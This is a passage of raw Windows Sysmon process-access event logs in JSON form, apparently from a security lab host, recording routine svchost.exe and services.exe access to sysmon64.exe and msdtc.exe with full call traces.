C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.592\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.592","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.655\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-001091170500}\r\nTargetProcessId: 3364\r\nTargetImage: C:\\Windows\\System32\\msdtc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 